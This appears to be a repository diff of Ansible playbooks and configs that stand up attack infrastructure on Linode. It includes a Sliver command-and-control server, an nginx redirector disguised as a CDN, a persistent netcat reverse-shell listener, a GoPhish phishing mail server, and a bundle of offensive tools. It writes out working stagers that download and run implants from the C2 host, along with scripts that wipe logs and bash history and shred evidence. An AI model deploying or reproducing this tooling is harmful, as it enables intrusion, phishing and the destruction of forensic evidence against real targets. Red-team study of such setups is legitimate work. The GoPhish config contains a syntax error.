#more_set_headers 'Server: Microsoft-IIS/8.5';
add_header Server "Microsoft-IIS/8.5";
server_name_in_redirect off;
# OPSEC: Hide proxy headers
proxy_hide_header X-Powered-By;
proxy_hide_header X-AspNet-Version;
proxy_hide_header X-Runtime;
# IP Rotation and proxying
real_ip_header X-Forwarded-For;
set_real_ip_from 127.0.0.1;
# Gzip Settings
gzip off; # Disabled to avoid BREACH attack
# Virtual Host Configs
include /etc/nginx/conf.d/*.conf;
include /etc/nginx/sites-enabled/*;
}
@@ -0,0 +1,27 @@
[Unit]
Description=Reverse Shell Handler Service
After=network.target
[Service]
Type=simple
User=root
Group=root
ExecStart=/opt/shell-handler/persistent-listener.sh
Restart=always
RestartSec=10
# Hide process information
PrivateTmp=true
ProtectSystem=full
NoNewPrivileges=true
# Make shell handler hard to find
StandardOutput=null
StandardError=null
# Environment variables
Environment="C2_HOST={{ c2_ip }}"
Environment="LISTEN_PORT={{ shell_handler_port }}"
[Install]
WantedBy=multi-user.target
@@ -0,0 +1,24 @@
[Unit]
Description=Sliver C2 Server
After=network.target
[Service]
Type=simple
User=root
Group=root
WorkingDirectory=/root/.sliver
ExecStart=/usr/local/bin/sliver-server daemon
Restart=always
RestartSec=10
# Security measures
PrivateTmp=true
ProtectHome=false
NoNewPrivileges=true
# Hide process information
StandardOutput=null
StandardError=null
[Install]
WantedBy=multi-user.target
+355
View File
@@ -0,0 +1,355 @@
---
- name: Create and configure Linode instance for C2 Server
hosts: localhost
gather_facts: false
connection: local
vars_files:
- vars.yaml
tasks:
- name: Select a random region
set_fact:
selected_region: "{{ region_choices | random }}"
- name: Create Linode instance
community.general.linode_v4:
access_token: "{{ linode_token }}"
label: "{{ instance_label }}"
type: "{{ plan }}"
region: "{{ selected_region }}"
image: "{{ image }}"
root_pass: "{{ lookup('password', '/dev/null length=16') }}"
authorized_keys:
- "{{ lookup('file', ssh_key_path) }}"
state: present
register: linode_instance
- name: Wait for Linode instance to be reachable
wait_for:
host: "{{ linode_instance.instance.ipv4[0] }}"
port: 22
delay: 30
timeout: 600
state: started
- name: Add Linode instance to inventory
add_host:
name: "{{ instance_label }}"
ansible_host: "{{ linode_instance.instance.ipv4[0] }}"
ansible_user: root
ansible_ssh_private_key_file: "{{ ssh_key_path | replace('.pub', '') }}"
- name: Secure and configure C2 server
hosts: "{{ instance_label }}"
gather_facts: true
tasks:
- name: Disable root password authentication for SSH immediately
ansible.builtin.lineinfile:
path: /etc/ssh/sshd_config
regexp: '^#?PasswordAuthentication'
line: 'PasswordAuthentication no'
state: present
- name: Restart SSH service to apply root password login restriction
ansible.builtin.service:
name: ssh
state: restarted
- name: Update apt package list
ansible.builtin.apt:
update_cache: yes
- name: Set a custom MOTD
template:
src: motd-linode.j2
dest: /etc/motd
owner: root
group: root
mode: '0644'
vars:
letsencrypt_email: "{{ letsencrypt_email }}"
mail_hostname: "{{ mail_hostname }}"
domain: "{{ domain }}"
gophish_admin_domain: "{{ gophish_admin_domain }}"
gophish_site_domain: "{{ gophish_site_domain }}"
- name: Hush Default Login Message
ansible.builtin.shell: |
rm -rf '/usr/bin/kali-motd'
- name: Install base utilities and tools via apt
ansible.builtin.apt:
name:
- git
- wget
- curl
- unzip
- python3-pip
- python3-venv
- tmux
- pipx
- nmap
- tcpdump
- hydra
- john
- hashcat
- sqlmap
- gobuster
- dirb
- enum4linux
- dnsenum
- seclists
- responder
- golang
- proxychains
- tor
- crackmapexec
- jq
- unzip
- postfix
- certbot
- opendkim
- opendkim-tools
- dovecot-core
- dovecot-imapd
- dovecot-pop3d
- dovecot-sieve
- dovecot-managesieved
- yq
state: present
- name: Ensure pipx path is configured
ansible.builtin.shell: |
pipx ensurepath
args:
executable: /bin/bash
- name: Install tools via pipx
ansible.builtin.shell: |
export PATH=$PATH:/root/.local/bin
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec
pipx install git+https://github.com/blacklanternsecurity/TREVORspray
pipx install impacket
args:
executable: /bin/bash
- name: Download Kerbrute
ansible.builtin.shell: |
mkdir -p ~/Tools/Kerbrute
wget https://github.com/ropnop/kerbrute/releases/latest/download/kerbrute_linux_amd64 -O ~/Tools/Kerbrute/kerbrute
chmod +x ~/Tools/Kerbrute/kerbrute
args:
executable: /bin/bash
- name: Clone SharpCollection nightly builds
ansible.builtin.git:
repo: https://github.com/Flangvik/SharpCollection.git
dest: ~/Tools/SharpCollection
version: master
- name: Clone PEASS-ng
ansible.builtin.git:
repo: https://github.com/carlospolop/PEASS-ng.git
dest: ~/Tools/PEASS-ng
- name: Clone MailSniper
ansible.builtin.git:
repo: https://github.com/dafthack/MailSniper.git
dest: ~/Tools/MailSniper
- name: Clone Inveigh
ansible.builtin.git:
repo: https://github.com/Kevin-Robertson/Inveigh.git
dest: ~/Tools/Inveigh
- name: Install Sliver C2 server
ansible.builtin.shell: |
curl https://sliver.sh/install | sudo bash
systemctl enable sliver
systemctl start sliver
- name: Install Metasploit Framework (Nightly Build)
ansible.builtin.shell: |
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > ~/Tools/msfinstall
chmod 755 ~/Tools/msfinstall
~/Tools/msfinstall
args:
executable: /bin/bash
- name: Grab GoPhish
ansible.builtin.shell: |
curl -L "$(curl -s https://api.github.com/repos/gophish/gophish/releases/latest | jq -r '.assets[] | select(.browser_download_url | contains("linux-64bit.zip")) | .browser_download_url')" -o ~/Tools/gophish.zip
unzip ~/Tools/gophish.zip -d ~/Tools/gophish
rm -rf ~/Tools/gophish.zip
chmod +x ~/Tools/gophish
- name: Deploy Gophish config.json with custom admin port
template:
src: gophish-config.j2
dest: ~/Tools/gophish/config.json
owner: root
group: root
mode: '0644'
vars:
gophish_admin_port: "{{ gophish_admin_port }}"
domain: "{{ domain }}"
- name: Configure Postfix main.cf
lineinfile:
path: /etc/postfix/main.cf
regexp: "{{ item.regexp }}"
line: "{{ item.line }}"
with_items:
- { regexp: '^myhostname', line: "myhostname = mail.{{ domain }}" }
- { regexp: '^mydomain', line: "mydomain = {{ domain }}" }
- { regexp: '^myorigin', line: "myorigin = $mydomain" }
- { regexp: '^inet_interfaces', line: "inet_interfaces = all" }
- { regexp: '^inet_protocols', line: "inet_protocols = ipv4" }
- { regexp: '^smtpd_banner', line: "smtpd_banner = $myhostname ESMTP $mail_name" }
- { regexp: '^mynetworks', line: "mynetworks = 127.0.0.0/8 [::1]/128" }
- { regexp: '^relay_domains', line: "relay_domains = $mydestination" }
- { regexp: '^smtpd_tls_cert_file', line: "smtpd_tls_cert_file = /etc/letsencrypt/live/{{ domain }}/fullchain.pem" }
- { regexp: '^smtpd_tls_key_file', line: "smtpd_tls_key_file = /etc/letsencrypt/live/{{ domain }}/privkey.pem" }
- { regexp: '^smtpd_tls_security_level', line: "smtpd_tls_security_level = encrypt" }
- { regexp: '^smtpd_tls_session_cache_database', line: "smtpd_tls_session_cache_database = btree:${data_directory}/smtpd_scache" }
- { regexp: '^smtp_tls_session_cache_database', line: "smtp_tls_session_cache_database = btree:${data_directory}/smtp_scache" }
- { regexp: '^smtpd_use_tls', line: "smtpd_use_tls = yes" }
- { regexp: '^smtpd_tls_auth_only', line: "smtpd_tls_auth_only = yes" }
- { regexp: '^milter_default_action', line: "milter_default_action = accept" }
- { regexp: '^milter_protocol', line: "milter_protocol = 6" }
- { regexp: '^smtpd_milters', line: "smtpd_milters = unix:/var/spool/postfix/opendkim/opendkim.sock" }
- { regexp: '^non_smtpd_milters', line: "non_smtpd_milters = unix:/var/spool/postfix/opendkim/opendkim.sock" }
- name: Configure OpenDKIM
lineinfile:
path: /etc/opendkim.conf
regexp: "{{ item.regexp }}"
line: "{{ item.line }}"
with_items:
- { regexp: '^Domain', line: "Domain {{ domain }}" }
- { regexp: '^KeyFile', line: "KeyFile /etc/opendkim/keys/{{ domain }}/mail.private" }
- { regexp: '^Selector', line: "Selector mail" }
- { regexp: '^Socket', line: "Socket local:/var/spool/postfix/opendkim/opendkim.sock" }
- { regexp: '^Syslog', line: "Syslog yes" }
- { regexp: '^UMask', line: "UMask 002" }
- { regexp: '^Mode', line: "Mode sv" }
- name: Create DKIM directory
file:
path: /etc/opendkim/keys/{{ domain }}
state: directory
owner: opendkim
group: opendkim
mode: 0700
- name: Generate DKIM keys
command: >
opendkim-genkey -D /etc/opendkim/keys/{{ domain }} -d {{ domain }} -s mail
args:
creates: /etc/opendkim/keys/{{ domain }}/mail.private
- name: Set permissions for DKIM keys
file:
path: /etc/opendkim/keys/{{ domain }}/mail.private
owner: opendkim
group: opendkim
mode: 0600
- name: Configure OpenDKIM TrustedHosts
copy:
content: |
127.0.0.1
::1
localhost
{{ domain }}
dest: /etc/opendkim/TrustedHosts
owner: opendkim
group: opendkim
mode: 0644
- name: Enable submission port (587) in master.cf
blockinfile:
path: /etc/postfix/master.cf
insertafter: '^#submission'
block: |
submission inet n - y - - smtpd
-o syslog_name=postfix/submission
-o smtpd_tls_security_level=encrypt
-o smtpd_sasl_auth_enable=yes
-o smtpd_recipient_restrictions=permit_sasl_authenticated,reject
-o smtpd_relay_restrictions=permit_sasl_authenticated,reject
# Dovecot Configuration for SASL
- name: Configure Dovecot for Postfix SASL
blockinfile:
path: /etc/dovecot/conf.d/10-master.conf
insertafter: '^service auth {'
block: |
# Postfix smtp-auth
unix_listener /var/spool/postfix/private/auth {
mode = 0660
user = postfix
group = postfix
}
- name: Set Dovecot auth_mechanisms
lineinfile:
path: /etc/dovecot/conf.d/10-auth.conf
regexp: '^auth_mechanisms'
line: 'auth_mechanisms = plain login'
- name: Create Dovecot password file for SASL authentication
file:
path: /etc/dovecot/passwd
state: touch
mode: '0600'
owner: dovecot
group: dovecot
- name: Add SMTP auth user to Dovecot
lineinfile:
path: /etc/dovecot/passwd
line: "{{ smtp_auth_user }}:{{ smtp_auth_pass | password_hash('sha512_crypt') }}"
- name: Disable system auth and use passwd-file
lineinfile:
path: /etc/dovecot/conf.d/10-auth.conf
regexp: '^!include auth-system.conf.ext'
line: '#!include auth-system.conf.ext'
- name: Add auth-passwdfile configuration
blockinfile:
path: /etc/dovecot/conf.d/10-auth.conf
insertafter: '^auth_mechanisms ='
block: |
passdb {
driver = passwd-file
args = scheme=sha512_crypt /etc/dovecot/passwd
}
userdb {
driver = static
args = uid=vmail gid=vmail home=/var/vmail/%u
}
- name: Create vmail user/group
group:
name: vmail
gid: 5000
state: present
- name: Create vmail user
user:
name: vmail
uid: 5000
group: vmail
create_home: no
- name: Restart Postfix
service:
name: postfix
state: restarted
- name: Restart Dovecot
service:
name: dovecot
state: restarted
+341
View File
@@ -0,0 +1,341 @@
---
- name: Deploy Linode C2 server
hosts: localhost
gather_facts: false
connection: local
vars:
region: "{{ linode_region | default('us-east') }}"
instance_type: "{{ size | default('g6-standard-1') }}"
instance_name: "{{ c2_name | default('c2') }}"
domain: "{{ domain | default('example.com') }}"
c2_subdomain: "mail"
linode_image: "linode/debian11"
tasks:
- name: Create Linode C2 instance
community.general.linode_v4:
label: "{{ instance_name }}"
type: "{{ instance_type }}"
region: "{{ region }}"
image: "{{ linode_image }}"
root_pass: "{{ lookup('password', '/dev/null length=24 chars=ascii_letters,digits') }}"
authorized_keys:
- "{{ lookup('file', ssh_key) }}"
state: present
register: c2_instance
- name: Save C2 IP
set_fact:
c2_ip: "{{ c2_instance.instance.ipv4[0] }}"
- name: Wait for SSH to become available
wait_for:
host: "{{ c2_ip }}"
port: 22
delay: 10
timeout: 300
state: started
- name: Add C2 server to inventory
add_host:
name: c2
ansible_host: "{{ c2_ip }}"
ansible_user: "{{ ssh_user | default('root') }}"
ansible_ssh_private_key_file: "{{ ssh_key | replace('.pub', '') }}"
groups: c2servers
- name: Configure C2 server
hosts: c2servers
become: true
vars:
domain: "{{ domain | default('example.com') }}"
c2_subdomain: "mail"
letsencrypt_email: "{{ letsencrypt_email | default('admin@example.com') }}"
zero_logs: "{{ zero_logs | default(true) }}"
redirector_ip: "{{ hostvars['localhost']['redirector_ip'] | default('127.0.0.1') }}"
tasks:
- name: Update apt cache
apt:
update_cache: yes
- name: Install required packages
apt:
name:
- git
- wget
- curl
- python3-pip
- golang
- tmux
- nmap
- jq
- secure-delete
- socat
state: present
- name: Create directories for C2 operation
file:
path: "{{ item }}"
state: directory
mode: '0700'
owner: root
group: root
with_items:
- /opt/c2
- /opt/beacons
- /opt/payloads
- name: Create clean-logs.sh script
copy:
content: |
#!/bin/bash
# Zero-logs maintenance script
umask 077
# Disable syslog temporarily
systemctl stop rsyslog 2>/dev/null
systemctl stop systemd-journald 2>/dev/null
# Clear system logs
find /var/log -type f -name "*.log" -exec truncate -s 0 {} \;
find /var/log -type f -name "auth.log*" -exec truncate -s 0 {} \;
find /var/log -type f -name "syslog*" -exec truncate -s 0 {} \;
journalctl --vacuum-time=1s 2>/dev/null
# Clear bash history
for histfile in /root/.bash_history /home/*/.bash_history; do
[ -f "$histfile" ] && cat /dev/null > "$histfile" 2>/dev/null
done
history -c
# Clear Sliver logs
find /root/.sliver/logs -type f -exec cat /dev/null > {} \; 2>/dev/null
# Clear temporary directories
rm -rf /tmp/* /var/tmp/* 2>/dev/null
# Restart logging services
systemctl start systemd-journald 2>/dev/null
systemctl start rsyslog 2>/dev/null
echo "[+] Log cleaning complete"
exit 0
dest: /opt/c2/clean-logs.sh
mode: '0700'
owner: root
group: root
- name: Create secure-exit.sh script
copy:
content: |
#!/bin/bash
# Secure cleanup script
# Configuration
SECURE_DELETE_PASSES=7
MEMORY_WIPE=true
# Set secure umask
umask 077
# Function to securely delete files
secure_delete() {
local target=$1
echo "[+] Securely deleting: $target"
if command -v srm > /dev/null; then
srm -vzf $target 2>/dev/null
elif command -v shred > /dev/null; then
shred -vzfn $SECURE_DELETE_PASSES $target 2>/dev/null
else
# Fallback to dd if specialized tools aren't available
dd if=/dev/urandom of=$target bs=1M count=10 conv=notrunc 2>/dev/null
dd if=/dev/zero of=$target bs=1M count=10 conv=notrunc 2>/dev/null
rm -f $target 2>/dev/null
fi
}
echo "[+] Beginning secure exit procedure..."
# Stop all operational services
echo "[+] Stopping operational services..."
services=("sliver")
for service in "${services[@]}"; do
systemctl stop $service 2>/dev/null
done
# Kill any remaining operational processes
echo "[+] Terminating operational processes..."
process_names=("sliver" "nc" "python")
for proc in "${process_names[@]}"; do
pkill -9 $proc 2>/dev/null
done
# Clear all logs
echo "[+] Clearing logs..."
bash /opt/c2/clean-logs.sh
# Securely delete operational files
echo "[+] Removing operational files..."
operational_dirs=(
"/opt/c2"
"/opt/beacons"
"/opt/payloads"
"/root/.sliver"
)
for dir in "${operational_dirs[@]}"; do
find $dir -type f 2>/dev/null | while read file; do
secure_delete "$file"
done
rm -rf $dir 2>/dev/null
done
# Remove SSH keys
echo "[+] Removing SSH keys and configs..."
find /home/*/.ssh /root/.ssh -type f 2>/dev/null | while read file; do
secure_delete "$file"
done
# Clean memory if requested
if $MEMORY_WIPE; then
echo "[+] Wiping system memory..."
sync
echo 3 > /proc/sys/vm/drop_caches
swapoff -a
swapon -a
fi
echo "[+] Secure exit completed. Infrastructure has been sanitized."
# Remove this script itself
exec shred -n $SECURE_DELETE_PASSES -uz $0
dest: /opt/c2/secure-exit.sh
mode: '0700'
owner: root
group: root
- name: Create beacon-server.sh script
copy:
content: |
#!/bin/bash
# Beacon server script
# Configuration
BEACONS_DIR="/opt/beacons"
WEBSERVER_PORT=8443
# Set secure umask
umask 077
# Ensure beacons directory exists
mkdir -p $BEACONS_DIR
# Generate beacons using Sliver
echo "[+] Generating beacons for all platforms..."
# Make sure Sliver server is running
if ! pgrep -x "sliver-server" > /dev/null; then
echo "[!] Sliver server is not running, starting it..."
systemctl start sliver
sleep 5
fi
# Generate Windows beacon
sliver-cli generate --http {{ ansible_host }}:8888 --os windows --arch amd64 --save $BEACONS_DIR/windows.exe
# Generate Linux beacon
sliver-cli generate --http {{ ansible_host }}:8888 --os linux --arch amd64 --save $BEACONS_DIR/linux
# Generate macOS beacon
sliver-cli generate --http {{ ansible_host }}:8888 --os darwin --arch amd64 --save $BEACONS_DIR/macos
# Generate stagers
echo "#!/bin/bash
curl -s {{ ansible_host }}:8443/linux | chmod +x && ./linux" > $BEACONS_DIR/beacon.sh
chmod +x $BEACONS_DIR/beacon.sh
echo "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;
\$url = 'http://{{ ansible_host }}:8443/windows.exe';
\$outpath = \"\$env:TEMP\\update.exe\";
Invoke-WebRequest -Uri \$url -OutFile \$outpath;
Start-Process -NoNewWindow -FilePath \$outpath;" > $BEACONS_DIR/beacon.ps1
echo "[+] All beacons generated successfully"
# Serve beacons using Python's HTTP server
echo "[+] Starting HTTP server on port $WEBSERVER_PORT..."
cd $BEACONS_DIR
python3 -m http.server $WEBSERVER_PORT --bind 0.0.0.0 &
SERVER_PID=$!
echo "[+] Beacon server started with PID $SERVER_PID"
echo "[+] Beacons available at http://{{ ansible_host }}:$WEBSERVER_PORT/"
# Keep script running
trap "kill $SERVER_PID; echo '[+] Beacon server stopped'; exit 0" INT
while true; do sleep 1; done
dest: /opt/c2/beacon-server.sh
mode: '0700'
owner: root
group: root
- name: Install Sliver C2 framework
shell: |
curl https://sliver.sh/install | bash
args:
creates: /usr/local/bin/sliver-server
- name: Create Sliver service file
copy:
content: |
[Unit]
Description=Sliver C2 Server
After=network.target
[Service]
Type=simple
User=root
Group=root
WorkingDirectory=/root/.sliver
ExecStart=/usr/local/bin/sliver-server daemon
Restart=always
RestartSec=10
# Security measures
PrivateTmp=true
ProtectHome=false
NoNewPrivileges=true
# Hide process information
StandardOutput=null
StandardError=null
[Install]
WantedBy=multi-user.target
dest: /etc/systemd/system/sliver.service
mode: '0644'
owner: root
group: root
- name: Start and enable Sliver service
systemd:
name: sliver
state: started
enabled: yes
daemon_reload: yes
- name: Set up cron job for log cleaning
cron:
name: "Clean logs"
minute: "0"
hour: "*/6"
job: "/opt/c2/clean-logs.sh > /dev/null 2>&1"
when: zero_logs|bool
- name: Start beacon server
shell: |
nohup /opt/c2/beacon-server.sh > /dev/null 2>&1 &
args:
creates: /opt/beacons/windows.exe
+436
View File
@@ -0,0 +1,436 @@
---
- name: Deploy Linode redirector server
hosts: localhost
gather_facts: false
connection: local
vars:
region: "{{ linode_region | default('us-east') }}"
instance_type: "{{ size | default('g6-standard-1') }}"
instance_name: "{{ redirector_name | default('redirector') }}"
domain: "{{ domain | default('example.com') }}"
redirector_subdomain: "cdn"
linode_image: "linode/debian11"
tasks:
- name: Create Linode redirector instance
community.general.linode_v4:
label: "{{ instance_name }}"
type: "{{ instance_type }}"
region: "{{ region }}"
image: "{{ linode_image }}"
root_pass: "{{ lookup('password', '/dev/null length=24 chars=ascii_letters,digits') }}"
authorized_keys:
- "{{ lookup('file', ssh_key) }}"
state: present
register: redirector_instance
- name: Save redirector IP
set_fact:
redirector_ip: "{{ redirector_instance.instance.ipv4[0] }}"
- name: Wait for SSH to become available
wait_for:
host: "{{ redirector_ip }}"
port: 22
delay: 10
timeout: 300
state: started
- name: Add redirector to inventory
add_host:
name: redirector
ansible_host: "{{ redirector_ip }}"
ansible_user: "{{ ssh_user | default('root') }}"
ansible_ssh_private_key_file: "{{ ssh_key | replace('.pub', '') }}"
groups: redirectors
- name: Configure redirector
hosts: redirectors
become: true
vars:
domain: "{{ domain | default('example.com') }}"
redirector_subdomain: "cdn"
letsencrypt_email: "{{ letsencrypt_email | default('admin@example.com') }}"
zero_logs: "{{ zero_logs | default(true) }}"
shell_handler_port: 4444
c2_ip: "{{ hostvars['localhost']['c2_ip'] | default('127.0.0.1') }}"
tasks:
- name: Update apt cache
apt:
update_cache: yes
- name: Install required packages
apt:
name:
- nginx
- certbot
- python3-certbot-nginx
- socat
- netcat-openbsd
- cryptsetup
- secure-delete
state: present
- name: Create directories for OPSEC scripts
file:
path: "{{ item }}"
state: directory
mode: '0700'
owner: root
group: root
with_items:
- /opt/c2
- /opt/shell-handler
- name: Create clean-logs.sh script
copy:
content: |
#!/bin/bash
# Zero-logs maintenance script
umask 077
# Disable syslog temporarily
systemctl stop rsyslog 2>/dev/null
systemctl stop systemd-journald 2>/dev/null
# Clear system logs
find /var/log -type f -name "*.log" -exec truncate -s 0 {} \;
find /var/log -type f -name "auth.log*" -exec truncate -s 0 {} \;
find /var/log -type f -name "syslog*" -exec truncate -s 0 {} \;
journalctl --vacuum-time=1s 2>/dev/null
# Clear bash history
for histfile in /root/.bash_history /home/*/.bash_history; do
[ -f "$histfile" ] && cat /dev/null > "$histfile" 2>/dev/null
done
history -c
# Clear NGINX logs
for nginx_log in /var/log/nginx/*; do
[ -f "$nginx_log" ] && cat /dev/null > "$nginx_log" 2>/dev/null
done
# Clear temporary directories
rm -rf /tmp/* /var/tmp/* 2>/dev/null
# Restart logging services
systemctl start systemd-journald 2>/dev/null
systemctl start rsyslog 2>/dev/null
echo "[+] Log cleaning complete"
exit 0
dest: /opt/c2/clean-logs.sh
mode: '0700'
owner: root
group: root
- name: Create shell handler script
copy:
content: |
#!/bin/bash
# Automated shell handler for catching and upgrading reverse shells
# Configuration
LISTEN_PORT={{ shell_handler_port }}
C2_HOST="{{ c2_ip }}"
# Set secure permissions
umask 077
# Logging function
log() {
local timestamp=$(date +"%Y-%m-%d %H:%M:%S")
local message="$1"
echo "$timestamp - $message" | openssl enc -e -aes-256-cbc -pbkdf2 -pass pass:$RANDOM$RANDOM$RANDOM >> /opt/shell-handler/activity.log.enc
}
# Detect OS function
detect_os() {
local connection=$1
# Send commands to determine OS
echo "echo \$OSTYPE" > $connection
sleep 1
ostype=$(cat $connection | grep -i "linux\|darwin\|win")
if [[ $ostype == *"win"* ]]; then
echo "windows"
elif [[ $ostype == *"darwin"* ]]; then
echo "macos"
elif [[ $ostype == *"linux"* ]]; then
echo "linux"
else
# Try Windows-specific command
echo "ver" > $connection
sleep 1
winver=$(cat $connection | grep -i "microsoft windows")
if [[ -n "$winver" ]]; then
echo "windows"
else
# Default to Linux if we can't determine
echo "linux"
fi
fi
}
# Main shell handler loop
handle_connections() {
log "Shell handler started on port $LISTEN_PORT"
# Use mkfifo for bidirectional communication
PIPE_PATH="/tmp/shell_handler_pipe"
trap 'rm -f $PIPE_PATH' EXIT
while true; do
# Clean up existing pipe
rm -f $PIPE_PATH
mkfifo $PIPE_PATH
log "Waiting for incoming connection..."
nc -lvnp $LISTEN_PORT < $PIPE_PATH | tee $PIPE_PATH.output &
NC_PID=$!
# Wait for connection
wait $NC_PID
log "Connection closed, restarting listener..."
rm -f $PIPE_PATH.output
done
}
# Start the shell handler
handle_connections
dest: /opt/shell-handler/persistent-listener.sh
mode: '0700'
owner: root
group: root
- name: Create shell handler service
copy:
content: |
[Unit]
Description=Reverse Shell Handler Service
After=network.target
[Service]
Type=simple
User=root
Group=root
ExecStart=/opt/shell-handler/persistent-listener.sh
Restart=always
RestartSec=10
# Hide process information
PrivateTmp=true
ProtectSystem=full
NoNewPrivileges=true
# Make shell handler hard to find
StandardOutput=null
StandardError=null
# Environment variables
Environment="C2_HOST={{ c2_ip }}"
Environment="LISTEN_PORT={{ shell_handler_port }}"
[Install]
WantedBy=multi-user.target
dest: /etc/systemd/system/shell-handler.service
mode: '0644'
owner: root
group: root
- name: Configure NGINX for zero-logging
copy:
content: |
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;
events {
worker_connections 1024;
multi_accept on;
}
http {
# Basic Settings
sendfile on;
tcp_nopush on;
tcp_nodelay on;
keepalive_timeout 65;
types_hash_max_size 2048;
server_tokens off;
# MIME
include /etc/nginx/mime.types;
default_type application/octet-stream;
# Zero-logs configuration
access_log off;
error_log /dev/null crit;
# SSL Settings
ssl_protocols TLSv1.2 TLSv1.3;
ssl_prefer_server_ciphers on;
ssl_ciphers 'ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305';
# Headers to confuse fingerprinting
more_set_headers 'Server: Microsoft-IIS/8.5';
# Virtual Host Configs
include /etc/nginx/conf.d/*.conf;
include /etc/nginx/sites-enabled/*;
}
dest: /etc/nginx/nginx.conf
mode: '0644'
owner: root
group: root
when: zero_logs|bool
- name: Configure NGINX default site for C2 redirection
copy:
content: |
server {
listen 80;
listen [::]:80;
server_name {{ redirector_subdomain }}.{{ domain }};
# Redirect to HTTPS
return 301 https://$host$request_uri;
}
server {
listen 443 ssl;
listen [::]:443 ssl;
server_name {{ redirector_subdomain }}.{{ domain }};
# SSL Configuration (self-signed until Let's Encrypt is set up)
ssl_certificate /etc/ssl/certs/ssl-cert-snakeoil.pem;
ssl_certificate_key /etc/ssl/private/ssl-cert-snakeoil.key;
# Root directory
root /var/www/html;
index index.html;
# Special URI patterns for C2 traffic
location /ajax/ {
proxy_pass http://{{ c2_ip }}:8888;
proxy_http_version 1.1;
proxy_set_header Host $host;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
}
# Default location
location / {
try_files $uri $uri/ =404;
}
# Disable logging for this server block
access_log off;
error_log /dev/null crit;
}
# Catch-all server block
server {
listen 80 default_server;
listen [::]:80 default_server;
# Redirect all unknown traffic to a legitimate-looking site
return 301 https://www.google.com;
# Disable logs
access_log off;
error_log /dev/null crit;
}
dest: /etc/nginx/sites-available/default
mode: '0644'
owner: root
group: root
- name: Create legitimate-looking index.html
copy:
content: |
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>{{ redirector_subdomain }} - Content Delivery Network</title>
<style>
body {
font-family: Arial, sans-serif;
margin: 0;
padding: 0;
background-color: #f4f4f4;
}
header {
background-color: #2c3e50;
color: white;
padding: 1em;
text-align: center;
}
.container {
width: 80%;
margin: 0 auto;
padding: 2em;
}
.card {
background-color: white;
border-radius: 5px;
padding: 1.5em;
margin-bottom: 1.5em;
box-shadow: 0 2px 5px rgba(0,0,0,0.1);
}
</style>
</head>
<body>
<header>
<h1>{{ redirector_subdomain }}.{{ domain }}</h1>
<p>Enterprise Content Delivery Network</p>
</header>
<div class="container">
<div class="card">
<h2>Welcome to Our CDN</h2>
<p>This server is part of our global content delivery network, optimizing digital asset delivery for enterprise applications.</p>
<p><em>This is a private service. Unauthorized access is prohibited.</em></p>
</div>
</div>
</body>
</html>
dest: /var/www/html/index.html
mode: '0644'
owner: www-data
group: www-data
- name: Start and enable shell handler service
systemd:
name: shell-handler
state: started
enabled: yes
daemon_reload: yes
- name: Set up cron job for log cleaning
cron:
name: "Clean logs"
minute: "0"
hour: "*/6"
job: "/opt/c2/clean-logs.sh > /dev/null 2>&1"
when: zero_logs|bool
- name: Install Let's Encrypt certificate if domain specified
shell: |
certbot --nginx -d {{ redirector_subdomain }}.{{ domain }} --non-interactive --agree-tos -m {{ letsencrypt_email }}
args:
creates: /etc/letsencrypt/live/{{ redirector_subdomain }}.{{ domain }}/fullchain.pem
when: domain != "example.com"
- name: Restart NGINX
systemd:
name: nginx
state: restarted
+23
View File
@@ -0,0 +1,23 @@
{
"admin_server": {
"listen_url": "0.0.0.0:{{ gophish_admin_port }}",
"use_tls": true,
"cert_path": "/etc/letsencrypt/live/{{ domain }}/fullchain.pem",
"key_path": "/etc/letsencrypt/live/{{ domain }}/privkey.pem"
"trusted_origins": []
},
"phish_server": {
"listen_url": "0.0.0.0:80",
"use_tls": false,
"cert_path": "/etc/letsencrypt/live/{{ domain }}/fullchain.pem",
"key_path": "/etc/letsencrypt/live/{{ domain }}/privkey.pem"
},
"db_name": "sqlite3",
"db_path": "gophish.db",
"migrations_prefix": "db/db_",
"contact_address": "",
"logging": {
"filename": "",
"level": ""
}
}
+46
View File
@@ -0,0 +1,46 @@
Welcome to your new C2 Server!
The following tools and utilities have been installed:
Apt-Installed Tools:
--------------------
- git, wget, curl, unzip
- python3-pip, python3-venv, pipx
- tmux, nmap, tcpdump, hydra, john, hashcat
- sqlmap, gobuster, dirb, enum4linux, dnsenum, seclists, responder
- golang, proxychains, tor, crackmapexec, jq, unzip
- postfix, certbot, opendkim, opendkim-tools
Pipx-Installed Tools:
---------------------
- NetExec: git+https://github.com/Pennyw0rth/NetExec
- TREVORspray: git+https://github.com/blacklanternsecurity/TREVORspray
- impacket: (various network protocols and service tools)
Custom Tools Installed in ~/Tools:
----------------------------------
- SharpCollection: ~/Tools/SharpCollection
- Kerbrute: ~/Tools/Kerbrute
- PEASS-ng: ~/Tools/PEASS-ng
- MailSniper: ~/Tools/MailSniper
- Inveigh: ~/Tools/Inveigh
- Gophish: ~/Tools/gophish (unzipped here)
Other Installed C2 Frameworks:
------------------------------
- Metasploit Framework: system installed (run 'msfconsole')
- Sliver C2: system installed (run 'sliver')
Also, remember that many reconnaissance and attack tools are now available system-wide due to the apt and pipx installations.
Once your DNS record points to this servers public IP, you can obtain a Lets Encrypt certificate by running:
sudo certbot certonly --non-interactive --agree-tos --email {{ letsencrypt_email }} --standalone -d {{ mail_hostname }}
sudo certbot certonly --non-interactive --agree-tos --email {{ letsencrypt_email }} --standalone -d {{ domain }}
Remember to ensure your DNS is set correctly before running the above command.
**IMPORTANT:**
Dont forget to set up a DMARC record for your domain. Update your DNS providers dashboard (e.g., GoDaddy) to add a TXT record named `_dmarc` with a suitable DMARC policy (e.g., `v=DMARC1; p=reject; rua=mailto:admin@{{ domain }}; ruf=mailto:admin@{{ domain }}; pct=100`). This ensures better email deliverability and security for your domain.
+1246
View File
File diff suppressed because it is too large Load Diff
+6
